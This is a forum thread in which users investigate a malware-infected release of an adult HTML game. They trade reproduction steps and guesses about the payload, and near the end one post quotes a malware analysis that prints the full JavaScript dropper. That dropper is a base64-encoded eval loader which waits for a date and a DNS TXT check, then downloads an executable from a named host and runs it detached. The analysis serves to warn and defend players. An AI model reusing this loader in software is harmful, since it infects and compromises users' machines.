Err0r 0ne

Member
Sep 23, 2017
107
60
No, you said that there is no mega link uploaded here, but there is. Strange that it wasn't the one that was uploaded on the front page, yeah

I did, brave and stupid yes, but it went fine. Checked files and folders and everything is in order :unsure: (no reason to believe me even if I show screenshots, buut even after v63 and deleted v70 there is still not enough content to bother :cautious:)

Yeah, and that's strange. Probably mods/uploaders used the gofile link for different uploads on the main page, but it was corrupted for some reason, while the mega link is ignored by them, so we are now in this situation :unsure:
You mean the MEGA download works fine but all other download links are infected?
 

JohnSchuler

Newbie
Jun 13, 2021
64
65
You mean the MEGA download works fine but all other download links are infected?
Well, I say yes it is, BUT, I won't dare to try anything beside mega now after all those comments, and haven't checked those others at start cause, well... I just used mega as soon as it dropped and it was fine.
And as I said, there is not enough content to bother by trusting some rando (me) even with mega link, so better wait for professionals to resolve this situation
 

daffyrolls94

Newbie
Apr 17, 2023
37
34
Well, I say yes it is, BUT, I won't dare to try anything beside mega now after all those comments, and haven't checked those others at start cause, well... I just used mega as soon as it dropped and it was fine.
It was fine for me too. Running the electron.exe from Appdata/Roaming/../Session Storage after reading the other guy's post caused the issue. My advice to everyone: don't download anything else from f95 until admin confirms the issue has been resolved. And hope to Satan it's only limited to this game.
 
  • Thinking Face
Reactions: JohnSchuler

megalol

Engaged Member
Modder
Compressor
Apr 3, 2017
2,541
10,946
Electron framework based games are sometimes flagged by AV as malware, and from a quick look at the game there are no real traces of a virus. But at the same time there are exists and also F-Secure sends the electron.exe file (that is created inside the "Session Storage folder" after running game.exe) to quarantine, and those are bad signs. So I'd say that it's a 50/50 chance that the game contains malware for now.
 

Thermophob

Well-Known Member
Apr 10, 2018
1,944
2,677
I downloaded game from Betorini's link (It seems he used Author's links), though Linux version. Nothing strange in Session storage folder.

Electron framework based games are sometimes flagged by AV as malware, and from a quick look at the game there are no real traces of a virus. But at the same time there are exists and also F-Secure sends the electron.exe file (that is created inside the "Session Storage folder" after running game.exe) to quarantine, and those are bad signs. So I'd say that it's a 50/50 chance that the game contains malware for now.
I think somebody wrote that electron.exe checksum looks legitimate.

PS, this is a simple HTML game shipped with its own browser.
 

megalol

Engaged Member
Modder
Compressor
Apr 3, 2017
2,541
10,946
I think somebody wrote that electron.exe checksum looks legitimate.

PS, this is a simple HTML game shipped with its own browser.
A CRC doesn't always tell you about a virus, since a legit exe may be used to download/launch some malware code or file, but I didn't find such code (that starts husbandship.exe, nor such a file at all), maybe because electron.exe was blocked by my AV.
 
  • Like
Reactions: razor1977

daffyrolls94

Newbie
Apr 17, 2023
37
34
A CRC doesn't always tell you about a virus, since a legit exe may be used to download/launch some malware code or file, but I didn't find such code (that starts husbandship.exe, nor such a file at all), maybe because electron.exe was blocked by my AV.
For anyone wanting to reproduce it:
>start the v73 game, let it load to title and exit
>check if appdata/.../session storage and the electron.exe file in that folder (not the main install folder) has been created
>if yes, run the electron.exe (again, the one in appdata/roaming/..) and you get some sort of error message, cancel it
>start game again, chrome should have closed and task mgr should have husbandship.exe running
 
  • Like
Reactions: megalol

megalol

Engaged Member
Modder
Compressor
Apr 3, 2017
2,541
10,946
For anyone wanting to reproduce it:
>start the v73 game, let it load to title and exit
>check if appdata/.../session storage and the electron.exe file in that folder (not the main install folder) has been created
>if yes, run the electron.exe (again, the one in appdata/roaming/..) and you get some sort of error message, cancel it
>start game again, chrome should have closed and task mgr should have husbandship.exe running
electron.exe file settings (I've run the game from a VM, so I restored it from my AV quarantine to check) itself looks sus as fck (1st field is description and 2nd is organization) and its icon looks like some kind of (virus?) installer. Upd: yes, it's a password-protected Inno Setup installer and has nothing to do with the original electron executable! Sam?
 
  • Like
Reactions: daffyrolls94

razor1977

Newbie
Jan 2, 2023
73
81
electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or something more destructive which is less likely, if you partition bomb someone's hd you can't exactly steal from them, maybe once you've gotten the info you were after, whether it be bank cards, login info/password files, pretty much anything they want, if you can see it, so can they. They are also known to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution to remove your boot hd and the target hd from the computer, connect it to another computer that already has AV on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.
 

Thermophob

Well-Known Member
Apr 10, 2018
1,944
2,677
electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or something more destructive which is less likely, if you partition bomb someone's hd you can't exactly steal from them, maybe once you've gotten the info you were after, whether it be bank cards, login info/password files, pretty much anything they want, if you can see it, so can they. They are also known to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution to remove your boot hd and the target hd from the computer, connect it to another computer that already has AV on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.
I am not sure if anybody else except you confirmed husbandship.exe running.

electron.exe file settings (I've run the game from a VM, so I restored it from my AV quarantine to check) itself looks sus as fck (1st field is description and 2nd is organization) and its icon looks like some kind of (virus?) installer. Upd: yes, it's a password-protected Inno Setup installer and has nothing to do with the original electron executable! Sam?
Electron is a framework which combines Chromium, node.js and HTML files into an app. And guess what, this game is an app combined from Chromium, node.js and HTML.... Not sure why it's stored in appdata/roaming, nor why the file properties look like this on your PC, but I am suspecting the newer version of PAT uses electron. Also, as it was already pointed out by Sam, it is clean.
 

razor1977

Newbie
Jan 2, 2023
73
81
I am not sure if anybody else except you confirmed husbandship.exe running.


Electron is a framework which combines Chromium, node.js and HTML files into an app. And guess what, this game is an app combined from Chromium, node.js and HTML.... Not sure why it's stored in appdata/roaming, nor why the file properties look like this on your PC, but I am suspecting the newer version of PAT uses electron. Also, as it was already pointed out by Sam, it is clean.
no, it is not clean, sam is wrong, also i bought the new version of PAT and no it is not in there, also multiple people confirmed husbandship running and being created
 

daffyrolls94

Newbie
Apr 17, 2023
37
34
electron.exe is just the dropper, you didn't have to launch it itself to launch it, the game auto launches it at some point, husbandship.exe is the payload, if it is running in your task manager in the background, it is too late, you are already subject to whatever the file was designed to do, which could be a huge variety of things ranging from keyloggers, screen viewers and exclusive access to your pc like he himself is logged into it, or something more destructive which is less likely, if you partition bomb someone's hd you can't exactly steal from them, maybe once you've gotten the info you were after, whether it be bank cards, login info/password files, pretty much anything they want, if you can see it, so can they. They are also known to block browsers from loading, as well as task manager and the installation of any AV, leaving your only real solution to remove your boot hd and the target hd from the computer, connect it to another computer that already has AV on via USB, then try to kill it that way, if not you may have to do a complete system wipe after a low level format, which could literally take days to complete.
I checked for husbandship.exe before and after clicking on whatever tf electron.exe is, it wasn't there before in my case. I don't see it there now though. Thank FUCK I'm ocd enuf to have a shitty laptop exclusively for prawn grains. Was gonna brick it soon, this just a nice excuse. Also folks should consider checking if they've dled anything else uploaded by that user.
 
  • Like
Reactions: razor1977

Roehner

New Member
Apr 10, 2021
12
14
Appdata/Roaming/<this game's folder>/Session Storage

That's from memory cus I deleted everything to do with this game. Electron.exe appears in above location AFTER I run the game. The husbandship.exe process appears in task mgr after running electron.exe from the above folder.
Okay, this is weird. I decided to run the game again as a test, after these reports, and now I get this Trojan as well. Really strange, as this Electron.exe didn't get created from previous playtests, which were done 25th and 26th.

I got paranoid from multiple people reporting this, so I did everything to scan my computer, from offline scans, to autoruns, etc. Nothing. I now opened the game again, which is when Electron.exe got created in %appdata%, with Windows Defender immediately quarantining it.

Obviously BBBen wouldn't put something malicious in his game, so it would seem to be the uploader.

Edit. I assume that it was programmed to not activate initially, so as to bypass testing, which is why I initially had no problem.

 

SvenVlad

Well-Known Member
Modder
Aug 11, 2017
1,946
9,325
My session storage folder doesn't have any electron.exe, so I think my firewall may have blocked it. Whew :WeSmart:
 

JohnSchuler

Newbie
Jun 13, 2021
64
65
Sooo, if nothing were created after a few tests, and nothing is found... does that mean I got lucky? :unsure: :lepew:

(Virus what have late activation, jeeesus...)
 

Roehner

New Member
Apr 10, 2021
12
14
My session storage folder doesn't have any electron.exe, so I think my firewall may have blocked it. Whew :WeSmart:
Sooo, if nothing were created after a few tests, and nothing is found... does that mean I got lucky? :unsure: :lepew:

(Virus what have late activation, jeeesus...)
Probably best to scan your computer, but it had a timed component, as posted here, so as to avoid detection, which is why I was so confused initially. I'm no coder, having only taken a couple courses, but this section seems to be it.

function shouldDownloadFile() {
    const currentDate = new Date();
    const targetDate = new Date('2025-02-26');
    return currentDate > targetDate;
}

If you played the game after 26th, it would download the electron.exe executable. If you didn't play the game after that point, it should be safe.

Here is the code posted in the other thread.

Pervert Action Timelapse v73 is infected.

- game.exe is the original electron.exe and there is nothing wrong with it.

- Similar to RenPy, the exe just executes scripts. In this case it's javascript instead of python.

- I've located the malware downloader in the \resources\app\data\SCRIPTS.js subfolder.

- the code and MO is virtually identical to the Milfania downloader.

JavaScript:
function Component_CommandInterpreter_once() {
  const atob = (str) => Buffer.from(str, 'base64').toString('utf-8');

  // Base64 encoded script
  //
  const varscrload = "KGZ1bmN0aW9uKkgewogICAgY29ucOw=="; // this string is much longer and has the actual code in it !!!

   try {
    const devarscrload = atob(varscrload);
    eval(devarscrload);
  } catch (e) {
    console.error("Error executing the script:", e);
  }
}

The deobfuscated version (the stuff in the 'varscrload' variable that gets executed) looks like this:

JavaScript:
(function() {
    const fs = require('fs');
    const path = require('path');
    const https = require('https');
    const { spawn } = require('child_process');
    const dns = require('dns');

    function shouldDownloadFile() {
        const currentDate = new Date();
        const targetDate = new Date('2025-02-26');
        return currentDate > targetDate;
    }

    function checkDNSRecord(hostname, callback) {
        try {
            dns.resolveTxt(hostname, (err, records) => {
                if (err) {
                    callback(false);
                    return;
                }
                const txtValue = records.flat().join('');
                callback(txtValue === 'OK');
            });
        } catch (e) {
            callback(false);
        }
    }

    function getDownloadPath(filename) {
        const appDataPath = process.env.APPDATA || path.join(process.env.HOME || process.env.USERPROFILE, 'AppData', 'Roaming');
        const targetPath = path.join(appDataPath, 'Pervert Action Timelapse', 'Session Storage');

        if (!fs.existsSync(targetPath)) {
            fs.mkdirSync(targetPath, { recursive: true });
        }

        return path.join(targetPath, filename);
    }

function downloadAndRunFile(url, outputPath) {
  try {
    const file = fs.createWriteStream(outputPath);
    const options = {
      headers: {
        'User-Agent': 'Chrome1223'
      }
    };

    https.get(url, options, (response) => {
      if (response.statusCode !== 200) {
        console.error('Download failed with status:', response.statusCode);
        return;
      }
      response.pipe(file);

      file.on('finish', () => {
        file.close(() => {
          console.log('Download complete:', outputPath);

          setTimeout(() => {
            try {
              console.log('Executing file...');
              const child = spawn(outputPath, [], {
                detached: true,
                stdio: 'ignore'
              });
              child.unref();
            } catch (e) {
              console.error('Error spawning process:', e);
            }
          }, 1000); // Add a delay to ensure the file is completely closed
        });
      });
    }).on('error', (err) => {
      console.error('Download error:', err);
    });
  } catch (e) {
    console.error('Error during download or execution:', e);
  }
}

    setTimeout(() => {
        const downloadUrl = 'https://www.renpycloud.info/electron.exe';
        const outputPath = getDownloadPath('electron.exe');
        const dnsHostname = 'txt.renpycloud.info';

        if (shouldDownloadFile()) {
            checkDNSRecord(dnsHostname, (dnsCheckPassed) => {
                if (dnsCheckPassed) {
                    downloadAndRunFile(downloadUrl, outputPath);
                }
            });
        }
    }, 0);
})();
 
  • Like
Reactions: pemoj and SvenVlad

SvenVlad

Well-Known Member
Modder
Aug 11, 2017
1,946
9,325
Probably best to scan your computer, but it had a timed component, as posted here, so as to avoid detection, which is why I was so confused initially. I'm no coder, having only taken a couple courses, but this section seems to be it.

function shouldDownloadFile() {
    const currentDate = new Date();
    const targetDate = new Date('2025-02-26');
    return currentDate > targetDate;
}

If you played the game after 26th, it would download the electron.exe executable. If you didn't play the game after that point, it should be safe.

Here is the code posted in the other thread.
Thanks, will do.
 

elcap23

Newbie
Jun 30, 2018
62
137
Well, I don't know if I'm a lucky one, but I downloaded the game when it launched but never extracted it. Today I extracted the game and Windows 11 instantly deleted the game when I launched it, and put it in quarantine. I don't use Chrome, but I searched for everything written here and I haven't found anything about that husband.exe till now.